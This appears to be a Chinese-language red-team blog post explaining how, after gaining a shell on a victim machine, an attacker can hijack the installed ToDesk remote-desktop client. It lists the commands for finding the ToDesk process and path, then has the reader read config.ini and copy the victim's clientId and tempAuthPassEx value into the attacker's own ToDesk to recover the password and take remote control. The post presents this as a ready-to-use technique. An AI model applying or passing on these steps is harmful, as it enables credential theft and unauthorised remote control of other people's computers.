红队技巧5:利用todesk远程上线

红队技巧5:利用todesk远程上线

前言

在内网渗透的时候,有时候会存在杀毒软件使得不好执行一些命令
这时候,你发现了存在todesk进程,测试可以利用todesk进行远程上线

实验开始(模拟实战中getshell后的操作)

1.下载todesk
https://www.todesk.com/download.html
2.放到虚拟机里和本机里安装

3.然后执行tasklist发现存在ToDesk.exe字段

4.然后执行wmic process where name="ToDesk.exe" get processid,executablepath,name发现ToDesk的安装路径

5.进入ToDesk的安装路径并且执行type config.ini命令


获取到的config.ini如下
[ConfigInfo]
passUpdate=xxx1
PrivateScreenLockScreen=xxx2
autoLockScreen=xxx3
downloadtimes=xxx4
clientId=xxx5
PrivateData=xxx6
PluginExpiresDays=xxx7
Resolution=xxx8
tempAuthPassEx=xxx9
updatePassTime=xxx10
isOpenTempPass=xxx11
language=xxx12
isAdmissionControl=xxx13
WeakPasswordTip=xxx14
Version=xxx15
isUpdate=xxx16
PresetDialogUpdateDate=xxx17
PresetDialogShowCount=xxx18
NewToken=xxx19
Token=xxx20
LoginType=xxx21
user=xxx22
LoginPhone=xxx23
LoginEmail=xxx24
AreaCode=xxx25
6.其中
clientId=xxx5为设备代码,在这里本机的这里输入

7.然后要获取密码

获取方法:
先关掉本机todesk的临时密码,然后将本机的config.ini中的tempAuthPassEx替换为受害机的tempAuthPassEx=xxx9,重启本机的todesk,会发现
发现本机和受害机的todesk密码变相同了

8.输入密码,可以远控了

posted @ 2023-09-10 13:13  BattleofZhongDinghe  阅读(562)  评论(0编辑  收藏  举报